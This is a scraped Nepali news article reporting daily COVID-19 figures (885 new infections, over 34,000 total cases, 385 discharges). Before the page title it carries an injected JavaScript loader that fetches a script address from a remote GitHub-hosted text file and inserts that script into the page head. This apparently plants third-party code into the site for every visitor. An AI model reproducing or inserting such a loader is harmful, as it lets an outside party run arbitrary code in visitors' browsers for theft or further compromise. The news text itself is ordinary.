;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); ३४ हजार नाघ्यो कोरोना संक्रमित : ८८५ जनामा संक्रमण, ३८५ जना डिस्चार्ज – जुनेली न्युज
बिहिबार, बैशाख ५, २०८२
  • होमपेज
  • ३४ हजार नाघ्यो कोरोना संक्रमित : ८८५ जनामा संक्रमण, ३८५ जना डिस्चार्ज
समाचार

३४ हजार नाघ्यो कोरोना संक्रमित : ८८५ जनामा संक्रमण, ३८५ जना डिस्चार्ज

कोरोना

भदौ १०

काठमाडौं । पछिल्लो २४ घण्टामा ८८५ जनामा कोरोना भाइरसको संक्रमण देखिएको छ । स्वास्थ्य तथा जनसंख्या मन्त्रालयका अनुसार १३ हजार २ सय ५३ जनाको परीक्षण गर्दा ८ सय ८५ जनामा संक्रमण देखिएको हो ।

बुधबारसम्म नेपालमा कोरोना संक्रमितको संख्या ३४ हजार ४ सय १८ पुगेको छ । कोरोना भाइरस संक्रमणबाट निको भएर ३ सय ८५ जना घर फर्किएका छन् । हालसम्म १९ हजार ५ सय ४ जना घर फर्किएका छन् । हालसम्म होम आइसोलेसनमा ६ हजार २८ जना र संस्थागत आइसोलेसनमा ८ हजार ७११ जना रहेका छन् ।file Photo

फेसबुक प्रतिक्रियाहरु